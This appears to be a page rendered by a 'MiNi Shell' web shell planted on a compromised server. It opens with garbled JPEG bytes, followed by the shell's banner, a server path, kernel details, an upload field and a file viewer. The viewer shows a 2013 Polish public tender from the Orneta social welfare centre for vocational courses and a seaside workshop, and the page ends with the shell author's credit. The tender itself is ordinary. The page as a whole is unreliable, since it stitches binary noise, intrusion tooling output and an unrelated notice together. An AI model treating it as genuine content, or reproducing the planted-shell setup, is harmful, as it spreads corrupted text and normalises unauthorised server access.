JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130724/149957-N-2013.html

<p class="kh_header"><b>Orneta: Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu  Otwieramy Drzwi w Przyszłość- kursy zawodowe oraz warsztaty wyjazdowe.</b><br>
<b>Numer ogłoszenia: 149957 - 2013; data zamieszczenia: 24.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. 1 Maja 6, 11-130 Orneta, woj. warmińsko-mazurskie, tel. (055) 2421627, faks (055) 2422395.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu  Otwieramy Drzwi w Przyszłość- kursy zawodowe oraz warsztaty wyjazdowe..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Otwieramy Drzwi w Przyszłość , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji , Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 

Działania  te zostały podzielone na IV  części: 
CZĘŚĆ I- KURSY ZAWODOWE Z PRAWEM JAZDY KAT B 
Część I została podzielona na 3 zadania.
Zadanie  I: 
a) Sprzedawca - przedstawiciel handlowy z prawem jazdy kat. B
( sprzedawca- przedstawiciel handlowy teoria 50 h, bhp 8h, prawo jazdy kat. B: 30 h teoria, 30 h praktyka) - 8 osób- łącznie - 118 h
b) Sprzedawca- przedstawiciel handlowy z obsługa kasy fiskalnej i  prawem jazdy kat. B ( sprzedawca- przedstawiciel handlowy 50 h, kasa fiskalna 16 h, bhp 8 h, prawo jazdy kat. B 30 h teoria, 30 h praktyka)-4 osoby- łącznie 134 h -
c)Sprzedawca- przedstawiciel handlowy z obsługą kasy fiskalnej (sprzedawca- przedstawiciel handlowy- 84 godzin, kurs bhp 8, kasa fiskalna 16 godzin- 2 osoby , łącznie 108 godz.

Zajęcia teoretyczne z kursu sprzedawca- przedstawiciel handlowy (pierwsze 50 godzin) ,kurs kasy fiskalnej, kurs bhp mogą odbywać się w  1 grupie 14 osobowej.
Kursanci sami opłacą egzaminem na prawo jazdy oraz  zapłacą za badania lekarskie.
Program szkolenia powinien obejmować:
Sprzedawca i kasa fiskalna
rozmowy z Klientem
sprawnego i bezproblemowego przeprowadzania całego procesu sprzedaży
obsługi kasy fiskalnej - ZAJĘCIA PRAKTYCZNE NA KASACH FISKALNYCH !!! 
wystawiania faktur oraz innych pokwitowań
przyjmowania reklamacji lub zwrotu
rozliczania utargu 
przyjmowania, wydawania lub zwrotu towaru na magazyn 
przeprowadzania inwentaryzacji
Przedstawiciel handlowy
 Kim jest nasz klient, czyli jak właściwie rozpoznać potrzeby klientów
Język perswazji podczas rozmowy z klientem 
Negocjacje handlowe 
Sporządzanie oferty handlowej 
Jak sprzedać towar co do którego klient nie jest przekonany 
Zalety naszej oferty z punktu widzenia Klienta 
Asertywność Przedstawiciela Handlowego i Kontrahenta 
Kluczowe elementy sprzedaży, czyli nastawienie Przedstawiciela Handlowego do Klienta
Budowanie długofalowych relacji z Klientami
Zadanie II:
a) pielęgnacja dłoni i stylizacja paznokci z  prawem jazdy kat B ( pielęgnacja dłoni i stylizacja paznokci 50 h (praktyka), bhp-8h, kurs prawa jazdy kat. B 30 teoria 30 godzin jazda praktyczna)-
- 3 osoby- łącznie 118 godziny
b) pielęgnacja dłoni i stylizacja paznokci (100 h praktyka + 8 h bhp) 2 osoby-  łącznie 108 h

Zajęcia z pielęgnacji dłoni i paznokci mogą odbywać się łącznie dla 5 osób przez 50 h, pozostałe 50 godz. tylko dla 2 osób, kurs bhp 8 h łącznie dla 5 osób.
Kursanci sami opłacą egzaminem na prawo jazdy oraz  zapłacą za badania lekarskie.
Program kursu powinien obejmować:
Specyfika zawodu stylistki paznokci
Podstawy dermatologii i zakresu rozpoznawani i różnicowania powszechnych chorób skóry dłoni i paznokci
Podstawowe informacje z zakresu higieny usług, dezynfekcji 
Budowa paznokcia i jego funkcja 
Rodzaje i kształty naturalnej płytki paznokcia 
Manicure 
Założenie (krok po kroku)
Uzupełnienie (krok po kroku) 
Usuwanie masy żelowej, akrylowej z płytki (tzw. powrót do naturalnych paznokci) - PRAKTYKA 
Modelowanie paznokci u stóp (french na stałe) - PREZENTACJA 

Kursy praktyczne
omówienie produktów 
przygotowanie paznokci 
wymiana uszkodzonego tipsa 
przedłużanie na tipsie, szablonie, naturalnej płytce, modelowanie linii french, zatapianie ozdób 
korekcja, rekonstrukcja płytki zdeformowanej, obgryzionej, uszkodzonej 
efekt końcowy
Zadanie III: 
a) Stolarz z prawem jazdy kat. B ( stolarz 70 godzin w tym:- zajęcia praktyczne 50, zajęcia teoretyczne 20 h, bhp 8 h, kurs prawa jazdy: 30 h teoria, 30 h praktyka- łącznie - 138 h- 2 osoby
b) Stolarz- (100 godzin w tym 80 h praktyki, 20 godz teorii + bhp 8 h)- łącznie 108 h- 4 osoby

Zajęcia teoretyczne( 20 godzin) oraz zajęcia praktyczne (pierwsze 70 godzin), bhp (8 godzin)  mogą odbywać się łącznie, dla 6 osób.
Kursanci sami opłacą egzaminem na prawo jazdy oraz  zapłacą za badania lekarskie.

W trakcie zajęć praktycznych ma powstać: 
Altana 3m x 3m
- Słupy 14 x 14 cm, wys. 200 cm
- Podłoga - wylewka cementowa 3,5m x 3,5m, grubość 20cm.
-Balustrady mocowane do wysokości 100 cm. (balustrada X 10cm x 10cm.) Poręcz 12cm x 5cm.
- Dach kopertowy, deskowany deską boazeryjną, następnie kryty gontem bitumicznym Sonata lub Tango (kolor do wyboru). Krokwie 8 szt. 6cm x 12
 Wyposażenie:
a) stół o wymiarach 85 x 180 cm
b) 3 ławki przymocowane do konstrukcji altany 
-  Dwukrotna impregnacja wszystkich elementów Drewnochronem (kolor do wyboru).
- Ustawienie altany na bloczkach fundamentowych 
- Montaż.
- Wyrównanie ternu pod altanę 
Program nauczania
Bezpieczeństwo i Higiena Pracy na stanowisku stolarskim 
dokumentacja rysunkowa 
materiałoznawstwo 
maszyny, sprzęt oraz narzędzia w pracach stolarskich 
dobór właściwych materiałów oraz narzędzi 
wymiarowanie, tolerancje wymiarów i pasowania 
zasady obliczania zużycia materiałów płytowych 
nowoczesne technologie meblarskie 
okuwanie 
konstrukcje mebli skrzyniowych 
wykonywanie okładzin ściennych z różnych materiałów oraz prace stolarskie
 Termin realizacji III zadań: od momentu podpisania umowy do końca grudnia 2013 roku. Dokładny termin kursu ustalony zostanie z Wykonawcą na etapie podpisywania umowy .


CZĘŚĆ II- KURS PRAWA JAZDY KAT. C + E ( zajęcia teoretyczne 20 h + zajęcia praktyczne 25 h)- 1 osoba- łącznie 45 h
Kursanci sami opłacą egzaminem na prawo jazdy oraz  zapłacą za badania lekarskie.
Koszty  dojazdu na  zajęcia praktyczne i teoretyczne pokryje uczestnik.
Termin realizacji  zadania: od momentu podpisania umowy do końca grudnia 2013 roku. Dokładny termin kursu ustalony zostanie z Wykonawcą na etapie podpisywania umowy .

CZĘŚĆ III-KURS  ASYSTENTA - OPIEKUN DLA OSÓB STARSZYCH I NIEPEŁNOSPRAWNYCH ( zajęcia teoretyczne 50 h , zajęcia praktyczne 60 +  8 h BHP)łącznie
118 godzin - 1 osoba
Program kursu powinien obejmować tematykę :

- pomiar podstawowych funkcji życiowych człowieka
- zmiany związane z procesem starzenia
-pielęgnacja chorych leżących (toaleta całego ciała i toaleta przeciwodleżynowa)
-profilaktyka powikłań wynikających z długotrwałego unieruchomienia chorego
- żywienie osób starszych
- przygotowanie i podawanie posiłków osobie leżącej
- etyka- zagadnienia dotyczące zachowania wobec osoby chorej
- postępowanie wobec chorego w stanie agonalnym i po jego śmierci
- środki pielęgnacyjne i sprzęt pomocniczy w opiece nad chorym leżącym
-formy i zasady przyznawania pomocy społecznej osobom starszym i chorym w Polsce i na terenie Unii Europejskiej
- rodzaje i zakres usług opiekuńczych
- bezpieczeństwo własne podczas wykonywania zabiegów pielęgnacyjno - higienicznych
- organizacja stanowiska pracy i planu czasu pracy.
Termin realizacji  zadania : od momentu podpisania umowy do końca grudnia 2013 roku. Dokładny termin kursu ustalony zostanie z Wykonawcą na etapie podpisywania umowy.

CZĘŚĆ IV- 7 DNIOWE WARSZTATY WYJAZDOWE dla grupy osób niepełnosprawnych oraz ich opiekunów (3osoby) oraz umożliwienie monitoringu realizacji zadania przez 3 pracowników MGOPS w Ornecie oraz zapewnienie im bezpłatnego noclegu wraz z wyżywieniem przez cały okres trwania wyjazdu   

Podczas warsztatów mają odbyć  się zajęcia:
wspierające aktywność fizyczną (14 godzin),
zajęcia z zakresu warsztaty przedsiębiorczości- tworzenie przedsiębiorstwa społecznego, w tym spół. socjalnej., system wsparcia ekonomii społecznej. aspekt prawny i finansowy, dobre praktyki (15 godzin) 
indywidualne wsparcie psychologiczne (14 godzin)
Maksymalna liczba godzin na zajęciach: po 3 godziny dziennie dla każdego z zajęć.

Przedmiot zamówienia należy zrealizować w ośrodku wypoczynkowym w województwie pomorskim (Jastrzębia Góra, Władysławowo, Chałupy, Jastarnia, Łeba, Ustka) 
- w odległości od większej aglomeracji miejskiej nie większej niż 50km
- w odległości nie  większej niż 1km  od morza 
- preferowany obiekt położony w zalesieniu 
b) Obiekt; budynek murowany lub domki turystyczne ogrzewane (nie mogą być namioty), na terenie ogrodzonym , oświetlonym z dostępem do kompleksu rekreacyjno - sportowego na terenie ośrodka  posiadającym stołówkę na min. 13 osób , salę szkoleniową na min 7 osób, miejsce do prowadzenia zajęć na powietrzu (dostępne całodziennie). 
c) pokoje 1,  2 , 3 osobowe, ( 2 pokoje trzyosobowe, 3 pokoje dwuosobowe, 1 pokój jednoosobowy) -z łazienkami ; pokoje winny być wyposażone w niezbędny sprzęt z możliwością swobodnego rozpakowania bagażu, do każdego łóżka przynależna szafka , pokoje bez łóżek piętrowych i dostawek, dla każdego uczestnika osobne łóżko, TV. 
Ponadto obiekt powinien spełniać wymogi dotyczące bezpieczeństwa , ochrony przeciwpożarowej, warunków higieniczno -sanitarnych oraz ochrony środowiska określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji sanitarnej i ochrony środowiska. 
Wyżywienie 
Trzy posiłki dziennie 
- śniadanie , kolacja - w formie bufetu szwedzkiego
- obiad w formie talerzowej/ porcje
- napoje do posiłków takie jak herbata, woda, kompot - bez ograniczeń
Pobyt rozpocznie się w dniu przyjazdu - obiadem, natomiast zakończy się w dniu wyjazdu również obiadem 
Wykonawca zapewni suchy prowiant w postaci kanapek, wody lub soku, owoców na drogę powrotną. 
  
   Wykonawca w ramach usługi zapewni ponadto:
A)bogata oferta zajęć integracyjno - rozrywkowych np. ogniska, grillowanie, zabawy taneczne, wieczorki  integracyjne, animacje tematyczne itp. wraz z poczęstunkiem odpowiednim do typu imprez, wycieczki, w trakcie których uczestnicy będą mogli zwiedzić okoliczne atrakcje przyrodnicze i historyczne;.

B)Ubezpieczenie: na czas przejazdu, pobytu. Wykonawca ponosi pełną odpowiedzialność za wszelkie szkody wyrządzone przez uczestników. Obowiązek posiadania ubezpieczenia od OC. Uczestnicy muszą być ubezpieczeniu od następstw nieszczęśliwych wypadków i kosztów leczenia.
C)Opieka medyczna: zabezpieczenie podstawowych leków i materiałów opatrunkowych przez Wykonawcę, a w koniecznych przypadkach zapewnienia opieki pielęgniarskiej i lekarskiej polegającej na wezwaniu lekarza do ośrodka lub dowiezienia uczestnika pobytu do przychodni bezpłatnym transportem.

 Termin realizacji: od momentu podpisania umowy do końca sierpnia 2013 roku. Dokładny termin wyjazdu ustalony zostanie z Wykonawcą na etapie podpisywania umowy ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 55.12.00.00-7, 63.51.10.00-4, 63.51.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Uprawnień do wykonywania określonej działalności, jeżeli przepisy prawa nakładają obowiązek ich posiadania- nie wyznacza się warunku szczegółowego dla części I, III, IV.
 Za spełnienie tego  warunku zamawiający uzna złożenie przez wykonawcę złożenie oświadczenia o spełnieniu warunków udziału określonych w art .22 ust.1 ustawy PZP.
Część II- Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że jest ośrodkiem szkoleniowym posiadającym wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia, prowadzonego przez wojewodę właściwego ze ze względu na miejsce wykonania działalności objętej wpisem art.28 ustawy o kierujących pojazdami (tekst jednolity Dz. U. Z 2011 r. Nr 30, poz.151 z późn. zm ) -za spełnienie tego  warunku zamawiający uzna złożenie przez wykonawcę świadczenia o spełnieniu warunków udziału określonych w art .22 ust.1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia- wyznacza się warunek szczegółowy:
Część I  Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał lub wykonuje należycie co najmniej: 
- 1 kurs sprzedawcy, 
- 1kurs przedstawiciela handlowego, 
- 1 kurs kasy fiskalnej,
- 1 kurs prawa jazdy kat B , 
- 1 kurs BHP, 
- 1 kurs z zakresu pielęgnacji dłoni i stylizacji paznokcia , -  1 kurs stolarza.
i/ lub o podobnej i/lub równoważnej tematyce
Część II. Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał lub wykonuje należycie co najmniej 1 usługę szkoleniową o tematyce związanej z tym zadaniem tj. kurs prawa jazdy kat. C+ E
Część III- Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał lub wykonuje należycie co najmniej 1 usługę szkoleniową o tematyce związanej z tym zadaniem tj. kurs opiekuna osób starszych i niepełnosprawnych
Część IV. Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie wykonał lub wykonuje należycie co najmniej jedne  minimum 7 dniowe warsztaty wyjazdowe.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń. Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia- nie wyznacza się warunku szczegółowego. Za spełnienie tego  warunku zamawiający uzna złożenie przez wykonawcę złożenie oświadczenia o spełnieniu warunków udziału określonych w art .22 ust.1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia- nie wyznacza się warunku szczegółowego. Za spełnienie tego  warunku zamawiający uzna złożenie przez wykonawcę złożenie oświadczenia o spełnieniu warunków udziału określonych w art .22 ust.1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa- nie wyznacza się szczegółowego warunku. Za spełnienie tego  warunku zamawiający uzna złożenie przez wykonawcę złożenie oświadczenia o spełnieniu warunków udziału określonych w art .22 ust.1 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Usługi szkoleniowe oraz usługi organizacji warsztatów wyjazdowych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik 1- formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartych w umowie może nastąpić za zgodą obu stron wyrażoną 
w formie pisemnej, pod rygorem nieważności, i na zasadach, o których mowa w art. 144 ust.1 ustawy - Prawo zamówień publicznych z dnia 29.01.2004r. (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.),
Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu,
zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy,
w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania ilości osób biorących udział w poszczególnych kursach/szkoleniach warsztatach mogą ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną część/ilość uczestników przewidzianych SIWZ * ilość Uczestników biorących udział w zajęciach).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> Biuletyn informacji Publicznej Urzędu Miejskiego w Ornecie<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko- Gminny Ośrodek Pomocy Społecznej w ornecie, ul. 1 Maja 6, 11-130 Orneta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 10:30, miejsce: Miejsko- Gminny Ośrodek Pomocy Społecznej w ornecie, ul. 1 Maja 6, 11-130 Orneta- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Otwieramy Drzwi w Przyszłość , współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, priorytet VII. Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com